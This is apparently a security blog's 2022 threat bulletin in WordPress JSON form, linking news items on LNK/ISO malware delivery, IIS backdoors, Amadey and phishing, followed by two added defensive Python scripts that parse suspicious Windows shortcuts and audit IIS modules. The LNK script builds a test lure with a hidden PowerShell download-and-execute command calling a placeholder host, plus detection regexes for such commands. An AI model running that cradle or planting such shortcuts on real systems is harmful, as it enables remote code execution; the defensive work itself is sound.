{"id":104,"date":"2022-07-28T20:52:15","date_gmt":"2022-07-28T20:52:15","guid":{"rendered":"https:\/\/gcsecurity.us\/?p=104"},"modified":"2023-01-27T19:58:06","modified_gmt":"2023-01-27T19:58:06","slug":"security-bulletin-container-files-bots-and-industrial-espionage","status":"publish","type":"post","link":"https:\/\/gcsecurity.us\/?p=104","title":{"rendered":"Threat Intelligence Bulletin &#8211; Container Files, Bots, and Industrial Espionage"},"content":{"rendered":"\n<p>In response to Microsoft's plans to block Office macros by default, threat actors are shifting TTPs to container files (ISO, RAR) and Windows shortcut files (LNK)<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/hackers-opting-new-attack-methods-after.html\">https:\/\/thehackernews.com\/2022\/07\/hackers-opting-new-attack-methods-after.html<\/a><\/li><li><a href=\"https:\/\/www.darkreading.com\/endpoint\/post-macro-world-container-files-distribute-malware-replacement\">https:\/\/www.darkreading.com\/endpoint\/post-macro-world-container-files-distribute-malware-replacement<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Cisco releases patches for vulnerabilities affecting Nexus Dashboard for data centers<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/cisco-releases-patches-for-critical.html\">https:\/\/thehackernews.com\/2022\/07\/cisco-releases-patches-for-critical.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Overview of the new Linux malware \u201cLightning Framework\u201d, notable for its breadth of features and modular design<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/new-linux-malware-framework-let.html\">https:\/\/thehackernews.com\/2022\/07\/new-linux-malware-framework-let.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Info-stealing malware Amadey is being installed through a backdoor disguised as cracked software and can bypass Sophos and Windows Defender<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/cyware.com\/news\/amadey-bots-new-version-spreads-using-software-cracks-11f2a0ac\">https:\/\/cyware.com\/news\/amadey-bots-new-version-spreads-using-software-cracks-11f2a0ac<\/a><\/li><li><a href=\"https:\/\/www.darkreading.com\/attacks-breaches\/supercharged-version-amadey-infostealer-malware-dropper-bypass-av\">https:\/\/www.darkreading.com\/attacks-breaches\/supercharged-version-amadey-infostealer-malware-dropper-bypass-av<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Threat actors are increasingly using Internet Information Services (IIS) extensions to backdoor servers and establish persistence<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/malicious-iis-extensions-gaining.html\">https:\/\/thehackernews.com\/2022\/07\/malicious-iis-extensions-gaining.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Hardcoded password for the Atlassian Questions for Confluence app leaked, likely to lead to exploitation attempts<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.darkreading.com\/vulnerabilities-threats\/critical-bugs-atlassian-confluence-workspaces-open\">https:\/\/www.darkreading.com\/vulnerabilities-threats\/critical-bugs-atlassian-confluence-workspaces-open<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Researchers detail how Telegram and Discord, along with their associated bots, cloud infrastructure, and CDNs, are being used for attacks<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.darkreading.com\/application-security\/discord-telegram-hijacked-cyberattacks\">https:\/\/www.darkreading.com\/application-security\/discord-telegram-hijacked-cyberattacks<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Microsoft takes the top spot as the most impersonated brand in phishing attacks<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.darkreading.com\/attacks-breaches\/microsoft-tops-brands-phishers-prefer\">https:\/\/www.darkreading.com\/attacks-breaches\/microsoft-tops-brands-phishers-prefer<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Overview, IOCs, and whitepaper for an industrial espionage attack<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bitdefender.com\/blog\/labs\/under-siege-for-months-the-anatomy-of-an-industrial-espionage-operation\/\">https:\/\/www.bitdefender.com\/blog\/labs\/under-siege-for-months-the-anatomy-of-an-industrial-espionage-operation\/<\/a><\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>In response to Microsoft's plans to block Office macros by default, threat actors are shifting TTPs to container files (ISO, RAR) and Windows shortcut files (LNK) https:\/\/thehackernews.com\/2022\/07\/hackers-opting-new-attack-methods-after.html https:\/\/www.darkreading.com\/endpoint\/post-macro-world-container-files-distribute-malware-replacement Cisco releases patches for vulnerabilities affecting Nexus Dashboard for data centers https:\/\/thehackernews.com\/2022\/07\/cisco-releases-patches-for-critical.html Overview of the new Linux malware \u201cLightning Framework\u201d, notable for its breadth of features and modular design https:\/\/thehackernews.com\/2022\/07\/new-linux-malware-framework-let.html Info-stealing malware Amadey [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[15,14],"class_list":["post-104","post","type-post","status-publish","format-standard","hentry","category-news","tag-cybersecurity","tag-news"],"_links":{"self":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=104"}],"version-history":[{"count":2,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/104\/revisions"}],"predecessor-version":[{"id":108,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/104\/revisions\/108"}],"wp:attachment":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
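The first bulletin item records the move from macro documents to ISO/RAR containers carrying Windows shortcut (LNK) files. The shortcut is where the payload command lives, so the check a responder wants is a static parse of the .lnk rather than a detonation. The Python script below is an added example, not code from the bulletin or from the articles it links: it parses the ShellLinkHeader and StringData sections per MS-SHLLINK to recover the target path, arguments, working directory, icon and window mode, then flags the tells of a lure shortcut (a cmd/powershell target wearing another program's icon, a hidden window, download or encoded-command arguments). The two shortcut blobs are constructed inside the script, the LOLBin list, argument regex and finding codes are my own heuristics, and example.invalid is a placeholder domain.

```python
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags (MS-SHLLINK 2.1.1); only the low byte is needed for StringData
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that leaves no visible window
# StringData entries appear in this fixed order, each present only if flagged
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

def parse_lnk(data: bytes) -> dict:
    """Recover ShowCommand and the StringData strings from a .lnk blob."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a Shell Link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_command,) = struct.unpack_from("<I", data, 0x3C)
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize excludes its own 2 bytes
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:  # LinkInfoSize includes its own 4 bytes
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    info = {"show_command": show_command}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            info[key] = None
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters
        pos += 2
        nbytes = count * 2 if unicode else count  # no terminator follows
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated StringData for {key}")
        pos += nbytes
        info[key] = raw.decode("utf-16-le" if unicode else "cp1252")
    return info

LOLBIN_HOSTS = ("cmd.exe", "powershell", "pwsh", "mshta", "rundll32", "regsvr32",
                "wscript", "cscript", "certutil", "bitsadmin")
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|"
    r"download(string|file)|frombase64string|https?://", re.IGNORECASE)

def triage_lnk(info: dict) -> list:
    """Heuristic finding codes for a parsed shortcut; [] means nothing flagged."""
    findings = []
    target = (info.get("relative_path") or "").lower()
    args = info.get("arguments") or ""
    icon = (info.get("icon_location") or "").lower()
    if any(host in target for host in LOLBIN_HOSTS):
        findings.append("lolbin-target")
        if icon and not any(host in icon for host in LOLBIN_HOSTS):
            findings.append("icon-mismatch")  # cmd/powershell wearing another icon
    if SUSPICIOUS_ARGS.search(args):
        findings.append("suspicious-args")
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("hidden-window")
    return findings

def build_lnk(relative_path, arguments=None, working_dir=None,
              icon_location=None, show_command=1) -> bytes:
    """Build a minimal Unicode .lnk as a test fixture (constructed, not real)."""
    strings = [(HAS_RELATIVE_PATH, relative_path), (HAS_WORKING_DIR, working_dir),
               (HAS_ARGUMENTS, arguments), (HAS_ICON_LOCATION, icon_location)]
    flags = IS_UNICODE | HAS_LINK_TARGET_ID_LIST
    for flag, value in strings:
        if value is not None:
            flags |= flag
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    # one placeholder ItemID (2-byte size + 2 data bytes) followed by TerminalID
    id_list = struct.pack("<HH", 4, 0x501F) + b"\x00\x00"
    body = struct.pack("<H", len(id_list)) + id_list
    for flag, value in strings:
        if value is not None:
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    return header + body

# Constructed samples: a document-looking lure and an ordinary application
# shortcut; example.invalid is a placeholder domain, not a real C2.
LURE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\cmd.exe",
    arguments="/c powershell -w hidden -nop -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/p')\"",
    icon_location=r"%SystemRoot%\System32\imageres.dll",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN = build_lnk(relative_path=r"..\..\Program Files\Notepad++\notepad++.exe",
                   working_dir=r"C:\Program Files\Notepad++")
```

To use it on a real sample, mount or extract the ISO/RAR, read the .lnk bytes, and pass them to parse_lnk followed by triage_lnk; the parser skips LinkTargetIDList and LinkInfo by their declared sizes, so shortcuts with real ID lists and volume information parse the same way. The heuristics are a starting point for mail-gateway or sandbox pre-filtering, not a verdict: a shortcut to cmd.exe with a benign-looking icon and a hidden window is a strong tell, but the argument regex should be tuned against your own admin scripts before it gates anything.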
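The IIS item above notes that attackers register malicious IIS extensions to backdoor web servers and persist. Those extensions are ordinary IIS modules: native ones are registered under globalModules with a DLL path, managed ones under modules with a .NET type, both in applicationHost.config. The Python script below is an added example, not from the bulletin or the article it links: it audits a config excerpt and flags native modules whose DLL sits outside the IIS/.NET directories, managed modules whose type lives outside the framework namespaces, and modules enabled by name without a globalModules registration. The trusted-path and trusted-namespace lists are assumptions for a default Windows install, and the config excerpt, including the HttpCacheModule entry with a Temp-directory image and the FinanceAuth module, is constructed for the example.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Directories holding the native modules that ship with IIS and ASP.NET
# (assumption: default install paths; extend for relocated frameworks).
TRUSTED_IMAGE_PREFIXES = (
    "%windir%\\system32\\inetsrv\\", "c:\\windows\\system32\\inetsrv\\",
    "%windir%\\microsoft.net\\framework", "c:\\windows\\microsoft.net\\framework")
# Namespaces of the managed modules that ship with the framework (assumption).
TRUSTED_TYPE_PREFIXES = ("System.Web.", "System.ServiceModel.", "Microsoft.")

Finding = Tuple[str, str, str]  # (kind, module name, reason)

def audit_iis_modules(config_xml: str) -> List[Finding]:
    """Flag native modules loaded from outside the IIS/.NET directories and
    managed modules whose type lives outside the framework namespaces."""
    root = ET.fromstring(config_xml)
    findings: List[Finding] = []
    registered = set()
    # <globalModules> registers native (C/C++) modules by DLL path
    for add in root.iterfind(".//globalModules/add"):
        name, image = add.get("name", "?"), add.get("image", "")
        registered.add(name)
        if not image.lower().startswith(TRUSTED_IMAGE_PREFIXES):
            findings.append(("native", name, f"image outside IIS directories: {image}"))
    # <modules> enables native modules by name or managed modules by .NET type
    for add in root.iterfind(".//modules/add"):
        name, type_name = add.get("name", "?"), add.get("type")
        if type_name is None:
            if name not in registered:
                findings.append(("native", name, "enabled but absent from globalModules"))
            continue
        bare_type = type_name.split(",", 1)[0].strip()  # "Namespace.Type, Assembly"
        if not bare_type.startswith(TRUSTED_TYPE_PREFIXES):
            findings.append(("managed", name, f"type outside framework namespaces: {type_name}"))
    return findings

# Constructed applicationHost.config excerpt: two rogue entries hide among stock ones.
SAMPLE_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
      <add name="ManagedEngine64" image="%windir%\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll" preCondition="integratedMode,runtimeVersionv4.0,bitness64" />
      <add name="HttpCacheModule" image="C:\Windows\Temp\httpcache.dll" />
    </globalModules>
  </system.webServer>
  <location path="" overrideMode="Allow">
    <system.webServer>
      <modules>
        <add name="HttpLoggingModule" lockItem="true" />
        <add name="Session" type="System.Web.SessionState.SessionStateModule" preCondition="managedHandler" />
        <add name="HttpCacheModule" />
        <add name="FinanceAuth" type="FinanceAuth.Module, FinanceAuth" preCondition="managedHandler" />
      </modules>
    </system.webServer>
  </location>
</configuration>
"""

if __name__ == "__main__":
    for kind, name, reason in audit_iis_modules(SAMPLE_CONFIG):
        print(f"[{kind}] {name}: {reason}")
```

Run it against a copy of %windir%\System32\inetsrv\config\applicationHost.config from the server under review. The point of the rogue HttpCacheModule entry is that the name is a real IIS module name: a review that only reads names misses it, which is why the check keys on the image path. Site-level web.config files can also add managed modules, so the same function should be run over each application's web.config, and a module that passes both checks still deserves a hash comparison against a known-good host.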